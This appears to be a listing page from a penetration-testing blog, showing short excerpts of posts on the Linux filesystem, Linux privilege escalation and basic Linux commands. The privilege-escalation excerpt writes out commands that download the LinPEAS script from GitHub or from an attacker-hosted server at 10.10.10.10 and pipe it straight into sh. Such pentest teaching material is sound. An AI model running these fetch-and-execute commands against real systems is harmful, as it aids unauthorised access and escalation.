Posted inEnumeration Cheat Sheets
LINUX 101
Linux File System PathDescription/The top-level directory is the root filesystem and contains all of the files required to boot the operating system before other filesystems are mounted as well as…
Posted inPrivilege Escalation
Linux Privilege Escalation
LinPEAS Latest Releases: Release Release refs/heads/master 20230425-bd7331ea · carlospolop/PEASS-ng · GitHub # From Github curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh # Local network sudo python3 -m http.server 80 #Host curl 10.10.10.10/linpeas.sh…
Posted inCheat Sheets
Linux Commands – Cheat Sheet
Bash Commands uname -aShow system and kernelhead -n1 /etc/issueShow distriÂbutionmountShow mounted filesyÂstemsdateShow system dateuptimeShow uptimewhoamiShow your usernameman commandShow manual for command ls Options -aShow all (including hidden)-RRecursive list-rReverse order-tSort by last modified-SSort…


